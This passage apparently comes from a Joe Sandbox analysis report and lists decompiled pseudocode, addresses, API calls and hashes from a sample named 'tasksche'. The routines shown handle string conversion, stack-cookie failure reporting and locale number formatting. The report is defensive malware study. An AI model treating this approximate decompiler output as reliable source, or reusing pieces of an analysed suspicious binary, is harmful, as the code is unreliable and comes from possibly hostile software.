                                                                                              							goto L26;
                                                                                              						}
                                                                                              						L23:
                                                                                              						_push(6);
                                                                                              						goto L27;
                                                                                              					}
                                                                                              					L13:
                                                                                              					E00401C80(_t509);
                                                                                              					goto L6;
                                                                                              				}
                                                                                              				_t644 =  *(__ecx + 0xb044);
                                                                                              				_t500 =  *((intOrPtr*)(__ecx + 0xb060)) + 7;
                                                                                              				asm("adc ecx, edi");
                                                                                              				_t694 = _t644;
                                                                                              				if(_t694 < 0 || _t694 <= 0 &&  *((intOrPtr*)(__ecx + 0xb040)) <= _t500) {
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					 *((char*)(_t685 - 0xe)) = 1;
                                                                                              					E00401BBB(_t509);
                                                                                              					_t503 =  *((intOrPtr*)( *_t509 + 8))(_t685 - 0x28, 8);
                                                                                              					_t696 = _t503 - 8;
                                                                                              					if(_t503 == 8) {
                                                                                              						__eflags =  *((intOrPtr*)(_t509 + 0x6524)) + 0x4024;
                                                                                              						_t677 = _t509 + 0x1024;
                                                                                              						E00405FE7(_t677, _t644, _t650, 4,  *((intOrPtr*)(_t509 + 0x6524)) + 0x4024, _t685 - 0x28, _t650, _t650, _t650, _t650);
                                                                                              						 *(_t685 - 0x2c) = _t677;
                                                                                              						goto L11;
                                                                                              					}
                                                                                              					goto L5;
                                                                                              				}
                                                                                              			}


















































































                                                                                              0x00401cc6
                                                                                              0x00401cd0
                                                                                              0x00401cd6
                                                                                              0x00401cd7
                                                                                              0x00401cde
                                                                                              0x00401ce3
                                                                                              0x00401cec
                                                                                              0x00401cef
                                                                                              0x00401d4d
                                                                                              0x00401d4d
                                                                                              0x00401d7a
                                                                                              0x00401d7f
                                                                                              0x00401d84
                                                                                              0x00401d87
                                                                                              0x00401d31
                                                                                              0x00401d33
                                                                                              0x00401d38
                                                                                              0x00401d38
                                                                                              0x00401d3b
                                                                                              0x00401d3d
                                                                                              0x00401d40
                                                                                              0x00401d45
                                                                                              0x00401d46
                                                                                              0x0040271f
                                                                                              0x00402725
                                                                                              0x0040272d
                                                                                              0x0040272d
                                                                                              0x00401d97
                                                                                              0x00401d9d
                                                                                              0x00401dac
                                                                                              0x00401db4
                                                                                              0x00401db7
                                                                                              0x00401dc5
                                                                                              0x00401dd0
                                                                                              0x00401dd3
                                                                                              0x00401dd9
                                                                                              0x00401ddf
                                                                                              0x00401de2
                                                                                              0x00401df0
                                                                                              0x00401df0
                                                                                              0x00401df5
                                                                                              0x00401df6
                                                                                              0x00401e23
                                                                                              0x00401df8
                                                                                              0x00401df8
                                                                                              0x00401df8
                                                                                              0x00401df9
                                                                                              0x00401e17
                                                                                              0x00401dfb
                                                                                              0x00401dfb
                                                                                              0x00401dfb
                                                                                              0x00401dfe
                                                                                              0x00401e0f
                                                                                              0x00401e00
                                                                                              0x00401e00
                                                                                              0x00401e00
                                                                                              0x00401e01
                                                                                              0x00401e03
                                                                                              0x00401e03
                                                                                              0x00401e01
                                                                                              0x00401dfe
                                                                                              0x00401df9
                                                                                              0x00401e2d
                                                                                              0x00401e33
                                                                                              0x00401e39
                                                                                              0x00401e3c
                                                                                              0x00401e42
                                                                                              0x00401e45
                                                                                              0x00401e50
                                                                                              0x00401e50
                                                                                              0x00401e50
                                                                                              0x00401e53
                                                                                              0x00401e54
                                                                                              0x00401e57
                                                                                              0x00401e64
                                                                                              0x00401e71
                                                                                              0x00401e77
                                                                                              0x00401e7d
                                                                                              0x00401e83
                                                                                              0x00401e89
                                                                                              0x00401e8c
                                                                                              0x00402567
                                                                                              0x0040256f
                                                                                              0x00402576
                                                                                              0x0040257d
                                                                                              0x0040258a
                                                                                              0x00402596
                                                                                              0x00402598
                                                                                              0x004025a0
                                                                                              0x004025a4
                                                                                              0x004025b1
                                                                                              0x004025be
                                                                                              0x004025cb
                                                                                              0x004025d8
                                                                                              0x004025de
                                                                                              0x004025e4
                                                                                              0x004025e6
                                                                                              0x004025f3
                                                                                              0x004025f5
                                                                                              0x004025f5
                                                                                              0x004025f6
                                                                                              0x004025f6
                                                                                              0x00402602
                                                                                              0x00402612
                                                                                              0x00402612
                                                                                              0x00402615
                                                                                              0x0040261b
                                                                                              0x00402621
                                                                                              0x00402621
                                                                                              0x00402627
                                                                                              0x0040262f
                                                                                              0x00402635
                                                                                              0x004026e6
                                                                                              0x004026ec
                                                                                              0x004026f2
                                                                                              0x0040270c
                                                                                              0x0040270c
                                                                                              0x0040270f
                                                                                              0x00402712
                                                                                              0x00402714
                                                                                              0x00402717
                                                                                              0x0040271c
                                                                                              0x0040271d
                                                                                              0x00000000
                                                                                              0x0040271d
                                                                                              0x004026f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402700
                                                                                              0x00402706
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402706
                                                                                              0x0040263b
                                                                                              0x00402641
                                                                                              0x00402644
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040264a
                                                                                              0x0040264d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402653
                                                                                              0x00402656
                                                                                              0x004026b5
                                                                                              0x004026bc
                                                                                              0x004026c3
                                                                                              0x004026c8
                                                                                              0x004026cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004026d5
                                                                                              0x004026da
                                                                                              0x00000000
                                                                                              0x004026da
                                                                                              0x00402658
                                                                                              0x0040265f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402665
                                                                                              0x0040266e
                                                                                              0x00402672
                                                                                              0x00402678
                                                                                              0x00402679
                                                                                              0x00402679
                                                                                              0x0040267b
                                                                                              0x00402683
                                                                                              0x00402686
                                                                                              0x0040268a
                                                                                              0x0040268c
                                                                                              0x00402691
                                                                                              0x00402693
                                                                                              0x00402695
                                                                                              0x00402695
                                                                                              0x00402699
                                                                                              0x00402699
                                                                                              0x00402699
                                                                                              0x004026a5
                                                                                              0x004026ac
                                                                                              0x004026af
                                                                                              0x004026b3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004026b3
                                                                                              0x004025e8
                                                                                              0x004025ea
                                                                                              0x004025f1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004025f1
                                                                                              0x00401e92
                                                                                              0x0040253d
                                                                                              0x0040253d
                                                                                              0x00402547
                                                                                              0x00402555
                                                                                              0x0040255b
                                                                                              0x0040255b
                                                                                              0x00000000
                                                                                              0x00402547
                                                                                              0x00401e98
                                                                                              0x00401e9a
                                                                                              0x00401f2d
                                                                                              0x00401f30
                                                                                              0x00401f34
                                                                                              0x00401f38
                                                                                              0x00401f3e
                                                                                              0x00401f40
                                                                                              0x00401f40
                                                                                              0x00401f46
                                                                                              0x00401f4c
                                                                                              0x00401f4f
                                                                                              0x00401f56
                                                                                              0x00401f5d
                                                                                              0x00401f5f
                                                                                              0x00401f67
                                                                                              0x00401f6d
                                                                                              0x00401f77
                                                                                              0x00401f85
                                                                                              0x00401f93
                                                                                              0x00401f97
                                                                                              0x00401f9d
                                                                                              0x00401fa8
                                                                                              0x00401fa8
                                                                                              0x00401fa8
                                                                                              0x00000000
                                                                                              0x00401f9f
                                                                                              0x00401f9f
                                                                                              0x00401fa1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401fa5
                                                                                              0x00401faa
                                                                                              0x00401faa
                                                                                              0x00401fae
                                                                                              0x00401fb1
                                                                                              0x00401fb7
                                                                                              0x00401fc2
                                                                                              0x00401fc2
                                                                                              0x00401fc2
                                                                                              0x00401fc4
                                                                                              0x00401fc4
                                                                                              0x00401fcc
                                                                                              0x00401fd2
                                                                                              0x00401fd5
                                                                                              0x00401fd8
                                                                                              0x00401fde
                                                                                              0x00401fe0
                                                                                              0x00401ff3
                                                                                              0x00401ff3
                                                                                              0x00401fe2
                                                                                              0x00401fe2
                                                                                              0x00401fe2
                                                                                              0x00402000
                                                                                              0x0040200b
                                                                                              0x00402011
                                                                                              0x0040201f
                                                                                              0x0040202a
                                                                                              0x0040202d
                                                                                              0x00402034
                                                                                              0x00402038
                                                                                              0x0040203b
                                                                                              0x00402049
                                                                                              0x00402057
                                                                                              0x00402062
                                                                                              0x0040206f
                                                                                              0x0040207d
                                                                                              0x00402080
                                                                                              0x00402085
                                                                                              0x0040208c
                                                                                              0x00402093
                                                                                              0x00402096
                                                                                              0x004020d9
                                                                                              0x004020d9
                                                                                              0x004020dc
                                                                                              0x004020e2
                                                                                              0x004020e5
                                                                                              0x004020fa
                                                                                              0x004020fa
                                                                                              0x00402104
                                                                                              0x00402104
                                                                                              0x00402106
                                                                                              0x0040210c
                                                                                              0x0040210e
                                                                                              0x00402111
                                                                                              0x00402115
                                                                                              0x0040211b
                                                                                              0x00402121
                                                                                              0x00402123
                                                                                              0x00402129
                                                                                              0x0040212b
                                                                                              0x0040212b
                                                                                              0x00402121
                                                                                              0x00402132
                                                                                              0x00402136
                                                                                              0x00402141
                                                                                              0x00402141
                                                                                              0x00402141
                                                                                              0x00000000
                                                                                              0x00402138
                                                                                              0x00402138
                                                                                              0x0040213a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040213e
                                                                                              0x00402143
                                                                                              0x00402143
                                                                                              0x0040214f
                                                                                              0x0040214f
                                                                                              0x00402151
                                                                                              0x00402157
                                                                                              0x00402182
                                                                                              0x00402186
                                                                                              0x00402189
                                                                                              0x00402189
                                                                                              0x00402189
                                                                                              0x0040218c
                                                                                              0x00402193
                                                                                              0x00402199
                                                                                              0x004021ac
                                                                                              0x004021ae
                                                                                              0x004021b4
                                                                                              0x004021ba
                                                                                              0x004021c4
                                                                                              0x004021c6
                                                                                              0x004021cc
                                                                                              0x004021d2
                                                                                              0x004021d8
                                                                                              0x004021df
                                                                                              0x004021e5
                                                                                              0x004021e5
                                                                                              0x004021eb
                                                                                              0x004021f0
                                                                                              0x004021f3
                                                                                              0x004021f5
                                                                                              0x004021f5
                                                                                              0x00402203
                                                                                              0x00402208
                                                                                              0x0040220c
                                                                                              0x00402214
                                                                                              0x004022ad
                                                                                              0x004022b7
                                                                                              0x004022c2
                                                                                              0x004022c5
                                                                                              0x004022cc
                                                                                              0x004022ce
                                                                                              0x004022ce
                                                                                              0x004022ce
                                                                                              0x004022d1
                                                                                              0x004022d3
                                                                                              0x004022e0
                                                                                              0x004022ef
                                                                                              0x004022fc
                                                                                              0x00402303
                                                                                              0x00402305
                                                                                              0x00402321
                                                                                              0x00402328
                                                                                              0x0040234c
                                                                                              0x00402356
                                                                                              0x00402367
                                                                                              0x00402370
                                                                                              0x00402373
                                                                                              0x0040237b
                                                                                              0x00402384
                                                                                              0x00402393
                                                                                              0x0040239e
                                                                                              0x004023a6
                                                                                              0x004023ab
                                                                                              0x004023ad
                                                                                              0x004023af
                                                                                              0x004023af
                                                                                              0x004023b0
                                                                                              0x004023b0
                                                                                              0x004023ad
                                                                                              0x00402305
                                                                                              0x004023be
                                                                                              0x004023c5
                                                                                              0x004023c7
                                                                                              0x004023c9
                                                                                              0x004023c9
                                                                                              0x0040221a
                                                                                              0x0040221a
                                                                                              0x00402226
                                                                                              0x00402265
                                                                                              0x00402268
                                                                                              0x00402268
                                                                                              0x0040226a
                                                                                              0x0040226d
                                                                                              0x00402228
                                                                                              0x0040222b
                                                                                              0x00402237
                                                                                              0x00402242
                                                                                              0x0040225b
                                                                                              0x0040225e
                                                                                              0x0040225e
                                                                                              0x0040227f
                                                                                              0x00402292
                                                                                              0x0040229a
                                                                                              0x0040229a
                                                                                              0x004023d0
                                                                                              0x004023d7
                                                                                              0x004023e5
                                                                                              0x004023e5
                                                                                              0x004023f3
                                                                                              0x004023f8
                                                                                              0x004023ff
                                                                                              0x004024d6
                                                                                              0x004024dc
                                                                                              0x004024eb
                                                                                              0x004024f7
                                                                                              0x004024fd
                                                                                              0x00402505
                                                                                              0x00402507
                                                                                              0x00402514
                                                                                              0x0040251b
                                                                                              0x00402520
                                                                                              0x00402524
                                                                                              0x00402533
                                                                                              0x00402533
                                                                                              0x00402524
                                                                                              0x00000000
                                                                                              0x00402405
                                                                                              0x00402408
                                                                                              0x0040240d
                                                                                              0x00402411
                                                                                              0x00402411
                                                                                              0x00402411
                                                                                              0x0040241e
                                                                                              0x0040242a
                                                                                              0x00402433
                                                                                              0x00402436
                                                                                              0x00402439
                                                                                              0x00402440
                                                                                              0x00402443
                                                                                              0x0040244d
                                                                                              0x0040244f
                                                                                              0x00402452
                                                                                              0x00402454
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402456
                                                                                              0x00402458
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040245a
                                                                                              0x0040245e
                                                                                              0x0040246b
                                                                                              0x0040246b
                                                                                              0x00402476
                                                                                              0x0040247b
                                                                                              0x0040247f
                                                                                              0x00402481
                                                                                              0x00402481
                                                                                              0x00402481
                                                                                              0x00402481
                                                                                              0x00402487
                                                                                              0x0040248b
                                                                                              0x0040248b
                                                                                              0x0040248e
                                                                                              0x004024b5
                                                                                              0x004024c0
                                                                                              0x00402490
                                                                                              0x00402492
                                                                                              0x00402495
                                                                                              0x00402495
                                                                                              0x00402498
                                                                                              0x0040249b
                                                                                              0x004024a8
                                                                                              0x004024aa
                                                                                              0x004024ad
                                                                                              0x004024b0
                                                                                              0x004024b0
                                                                                              0x004024b0
                                                                                              0x004024b0
                                                                                              0x00000000
                                                                                              0x0040249b
                                                                                              0x004024c5
                                                                                              0x004024c5
                                                                                              0x004024c9
                                                                                              0x004024cc
                                                                                              0x004024cc
                                                                                              0x00000000
                                                                                              0x00402440
                                                                                              0x004023ff
                                                                                              0x00402164
                                                                                              0x00402166
                                                                                              0x0040216b
                                                                                              0x0040216f
                                                                                              0x00402172
                                                                                              0x0040217e
                                                                                              0x0040217e
                                                                                              0x00000000
                                                                                              0x0040217e
                                                                                              0x00402174
                                                                                              0x00402177
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040217b
                                                                                              0x00000000
                                                                                              0x0040217b
                                                                                              0x00402136
                                                                                              0x004020e7
                                                                                              0x004020ea
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004020ec
                                                                                              0x004020ef
                                                                                              0x004020f1
                                                                                              0x004020f1
                                                                                              0x00000000
                                                                                              0x00402098
                                                                                              0x0040209c
                                                                                              0x0040209c
                                                                                              0x0040209f
                                                                                              0x004020cf
                                                                                              0x00000000
                                                                                              0x004020cf
                                                                                              0x004020a1
                                                                                              0x004020a1
                                                                                              0x004020a3
                                                                                              0x004020c7
                                                                                              0x00000000
                                                                                              0x004020c7
                                                                                              0x004020a5
                                                                                              0x004020a5
                                                                                              0x004020a8
                                                                                              0x004020bb
                                                                                              0x004020bb
                                                                                              0x00000000
                                                                                              0x004020bb
                                                                                              0x004020aa
                                                                                              0x004020ad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004020af
                                                                                              0x00000000
                                                                                              0x004020af
                                                                                              0x00402096
                                                                                              0x00401fb9
                                                                                              0x00401fbb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401fbf
                                                                                              0x00000000
                                                                                              0x00401fbf
                                                                                              0x00401f9d
                                                                                              0x00401ea0
                                                                                              0x00401ea3
                                                                                              0x00000000
                                                                                              0x00401ea9
                                                                                              0x00401ea9
                                                                                              0x00401ebd
                                                                                              0x00401ec1
                                                                                              0x00401ec6
                                                                                              0x00401ed4
                                                                                              0x00401ee3
                                                                                              0x00401ee8
                                                                                              0x00401eee
                                                                                              0x00401ef4
                                                                                              0x00401ef6
                                                                                              0x00401ef8
                                                                                              0x00401f02
                                                                                              0x00401f02
                                                                                              0x00401f08
                                                                                              0x00401f0b
                                                                                              0x00401f19
                                                                                              0x00401f1c
                                                                                              0x00401f22
                                                                                              0x00401f22
                                                                                              0x00000000
                                                                                              0x00401f0b
                                                                                              0x00401ea3
                                                                                              0x00401e47
                                                                                              0x00401e4e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00401e4e
                                                                                              0x00401e3e
                                                                                              0x00401e3e
                                                                                              0x00000000
                                                                                              0x00401e3e
                                                                                              0x00401de4
                                                                                              0x00401de6
                                                                                              0x00000000
                                                                                              0x00401de6
                                                                                              0x00401cf7
                                                                                              0x00401cff
                                                                                              0x00401d02
                                                                                              0x00401d04
                                                                                              0x00401d06
                                                                                              0x00000000
                                                                                              0x00401d14
                                                                                              0x00401d16
                                                                                              0x00401d1a
                                                                                              0x00401d29
                                                                                              0x00401d2c
                                                                                              0x00401d2f
                                                                                              0x00401d61
                                                                                              0x00401d69
                                                                                              0x00401d72
                                                                                              0x00401d77
                                                                                              0x00000000
                                                                                              0x00401d77
                                                                                              0x00000000
                                                                                              0x00401d2f

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00401CC6
                                                                                              • _strlen.LIBCMT ref: 00402237
                                                                                                • Part of subcall function 00411B3C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00001FFF,?,?,004022BC,00000000,?,00000800,?,00001FFF,?), ref: 00411B58
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00402393
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                              • String ID: CMT
                                                                                              • API String ID: 1706572503-2756464174
                                                                                              • Opcode ID: 0be3d3ecc635031628957b47ccd727b43b6d95ea909fd416758fe2208c21c37e
                                                                                              • Instruction ID: 47e58a6222a9c82a3371e9f2a391d10810198bea5a194d1edf5ea2ede1dda2e7
                                                                                              • Opcode Fuzzy Hash: 0be3d3ecc635031628957b47ccd727b43b6d95ea909fd416758fe2208c21c37e
                                                                                              • Instruction Fuzzy Hash: 8B6201709006849FCF25DF64C8947EE7BB1AF14304F0844BEE986BB2D6DB795985CB28
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 85%
                                                                                              			E0041E6DE(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                              				intOrPtr _v0;
                                                                                              				void* _v804;
                                                                                              				intOrPtr _v808;
                                                                                              				intOrPtr _v812;
                                                                                              				intOrPtr _t6;
                                                                                              				intOrPtr _t11;
                                                                                              				intOrPtr _t12;
                                                                                              				intOrPtr _t13;
                                                                                              				long _t17;
                                                                                              				intOrPtr _t21;
                                                                                              				intOrPtr _t22;
                                                                                              				intOrPtr _t25;
                                                                                              				intOrPtr _t26;
                                                                                              				intOrPtr _t27;
                                                                                              				intOrPtr* _t31;
                                                                                              				void* _t34;
                                                                                              
                                                                                              				_t27 = __esi;
                                                                                              				_t26 = __edi;
                                                                                              				_t25 = __edx;
                                                                                              				_t22 = __ecx;
                                                                                              				_t21 = __ebx;
                                                                                              				_t6 = __eax;
                                                                                              				_t34 = _t22 -  *0x430298; // 0x9fbcfa05
                                                                                              				if(_t34 == 0) {
                                                                                              					asm("repe ret");
                                                                                              				}
                                                                                              				 *0x44ff68 = _t6;
                                                                                              				 *0x44ff64 = _t22;
                                                                                              				 *0x44ff60 = _t25;
                                                                                              				 *0x44ff5c = _t21;
                                                                                              				 *0x44ff58 = _t27;
                                                                                              				 *0x44ff54 = _t26;
                                                                                              				 *0x44ff80 = ss;
                                                                                              				 *0x44ff74 = cs;
                                                                                              				 *0x44ff50 = ds;
                                                                                              				 *0x44ff4c = es;
                                                                                              				 *0x44ff48 = fs;
                                                                                              				 *0x44ff44 = gs;
                                                                                              				asm("pushfd");
                                                                                              				_pop( *0x44ff78);
                                                                                              				 *0x44ff6c =  *_t31;
                                                                                              				 *0x44ff70 = _v0;
                                                                                              				 *0x44ff7c =  &_a4;
                                                                                              				 *0x44feb8 = 0x10001;
                                                                                              				_t11 =  *0x44ff70; // 0x0
                                                                                              				 *0x44fe6c = _t11;
                                                                                              				 *0x44fe60 = 0xc0000409;
                                                                                              				 *0x44fe64 = 1;
                                                                                              				_t12 =  *0x430298; // 0x9fbcfa05
                                                                                              				_v812 = _t12;
                                                                                              				_t13 =  *0x43029c; // 0x604305fa
                                                                                              				_v808 = _t13;
                                                                                              				 *0x44feb0 = IsDebuggerPresent();
                                                                                              				_push(1);
                                                                                              				E00424E29(_t14);
                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                              				_t17 = UnhandledExceptionFilter(0x42ba78);
                                                                                              				if( *0x44feb0 == 0) {
                                                                                              					_push(1);
                                                                                              					E00424E29(_t17);
                                                                                              				}
                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                              			}



















                                                                                              0x0041e6de
                                                                                              0x0041e6de
                                                                                              0x0041e6de
                                                                                              0x0041e6de
                                                                                              0x0041e6de
                                                                                              0x0041e6de
                                                                                              0x0041e6de
                                                                                              0x0041e6e4
                                                                                              0x0041e6e6
                                                                                              0x0041e6e6
                                                                                              0x00423e8e
                                                                                              0x00423e93
                                                                                              0x00423e99
                                                                                              0x00423e9f
                                                                                              0x00423ea5
                                                                                              0x00423eab
                                                                                              0x00423eb1
                                                                                              0x00423eb8
                                                                                              0x00423ebf
                                                                                              0x00423ec6
                                                                                              0x00423ecd
                                                                                              0x00423ed4
                                                                                              0x00423edb
                                                                                              0x00423edc
                                                                                              0x00423ee5
                                                                                              0x00423eed
                                                                                              0x00423ef5
                                                                                              0x00423f00
                                                                                              0x00423f0a
                                                                                              0x00423f0f
                                                                                              0x00423f14
                                                                                              0x00423f1e
                                                                                              0x00423f28
                                                                                              0x00423f2d
                                                                                              0x00423f33
                                                                                              0x00423f38
                                                                                              0x00423f44
                                                                                              0x00423f49
                                                                                              0x00423f4b
                                                                                              0x00423f53
                                                                                              0x00423f5e
                                                                                              0x00423f6b
                                                                                              0x00423f6d
                                                                                              0x00423f6f
                                                                                              0x00423f74
                                                                                              0x00423f88

                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00423F3E
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423F53
                                                                                              • UnhandledExceptionFilter.KERNEL32(0042BA78), ref: 00423F5E
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00423F7A
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00423F81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 2579439406-0
                                                                                              • Opcode ID: 4de6ed279e9cf42e89259ac0ebda5d4927e8938d534c68d964197d147836f072
                                                                                              • Instruction ID: 77c401cdca4814435c65699ef26cb777055d8c499ed0f7a386f9586c05fd5705
                                                                                              • Opcode Fuzzy Hash: 4de6ed279e9cf42e89259ac0ebda5d4927e8938d534c68d964197d147836f072
                                                                                              • Instruction Fuzzy Hash: 6F21C0B8A10208DFE710DF25F8496597BA0FB1A315F90117BE90887271EBB5599ECF0E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040D155(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
                                                                                              				short _v104;
                                                                                              				short _v304;
                                                                                              				int _t22;
                                                                                              				void* _t23;
                                                                                              				void* _t24;
                                                                                              				short* _t26;
                                                                                              
                                                                                              				if( *0x4300dc == 0) {
                                                                                              					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
                                                                                              					 *0x44cf24 = _v304;
                                                                                              					 *0x44cf26 = 0;
                                                                                              					 *0x4300dc = 0x44cf24;
                                                                                              				}
                                                                                              				E00410BF7(_t23, _t24, _a4, _a8,  &_v104, 0x32);
                                                                                              				_t22 = _a16;
                                                                                              				_t26 = _a12;
                                                                                              				 *_t26 = 0;
                                                                                              				GetNumberFormatW(0x400, 0,  &_v104, 0x4300cc, _t26, _t22);
                                                                                              				 *((short*)(_t26 + _t22 * 2 - 2)) = 0;
                                                                                              				return 0;
                                                                                              			}









                                                                                              0x0040d16d
                                                                                              0x0040d17b
                                                                                              0x0040d188
                                                                                              0x0040d190
                                                                                              0x0040d196
                                                                                              0x0040d196
                                                                                              0x0040d1ac
                                                                                              0x0040d1b1
                                                                                              0x0040d1b4
                                                                                              0x0040d1c0
                                                                                              0x0040d1ca
                                                                                              0x0040d1d3
                                                                                              0x0040d1db

                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0040D17B
                                                                                              • GetNumberFormatW.KERNEL32 ref: 0040D1CA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: FormatInfoLocaleNumber
                                                                                              • String ID:
                                                                                              • API String ID: 2169056816-0
                                                                                              • Opcode ID: fae0c5bc4c9ea969901553f08fe9413b92117c2e4d377c34b7ff725826ea960f
                                                                                              • Instruction ID: 2e86bd0250e0b4fef5c8dc12a3830970d19becb9d4c55c3472b337e1343b8b10
                                                                                              • Opcode Fuzzy Hash: fae0c5bc4c9ea969901553f08fe9413b92117c2e4d377c34b7ff725826ea960f
                                                                                              • Instruction Fuzzy Hash: DB017C35600248AEE710DFA4EC41FAAB7FCEF09714F005426FA04EB1A0D3B89915CB6D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 83%
                                                                                              			E00410178(void* __ecx, void* _a4, signed int _a8, signed int* _a12, signed int _a16) {
                                                                                              				intOrPtr* _v8;
                                                                                              				intOrPtr* _v12;
                                                                                              				signed int* _v16;
                                                                                              				void _v36;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				signed int* _t236;
                                                                                              				signed int _t244;
                                                                                              				signed int _t255;
                                                                                              				signed int _t264;
                                                                                              				signed int _t274;
                                                                                              				void* _t276;
                                                                                              				signed int _t286;
                                                                                              				signed int _t288;
                                                                                              				signed int _t292;
                                                                                              				signed int _t298;
                                                                                              				signed int* _t312;
                                                                                              				void* _t332;
                                                                                              				intOrPtr _t333;
                                                                                              				signed int _t337;
                                                                                              				signed int* _t340;
                                                                                              				signed int* _t341;
                                                                                              				signed int* _t345;
                                                                                              				signed int _t346;
                                                                                              				signed int* _t350;
                                                                                              				void* _t351;
                                                                                              				void* _t356;
                                                                                              				signed int _t389;
                                                                                              				void* _t390;
                                                                                              				signed int* _t392;
                                                                                              				signed int* _t400;
                                                                                              				signed int* _t408;
                                                                                              				signed int* _t412;
                                                                                              				signed int* _t415;
                                                                                              				signed int* _t420;
                                                                                              				void* _t421;
                                                                                              				void* _t422;
                                                                                              
                                                                                              				if(_a16 == 0) {
                                                                                              					_t286 = _a12;
                                                                                              				} else {
                                                                                              					_t286 = _a8;
                                                                                              					E0041C290(_t286, _t356, _t390, _t286, _a12, 0x40);
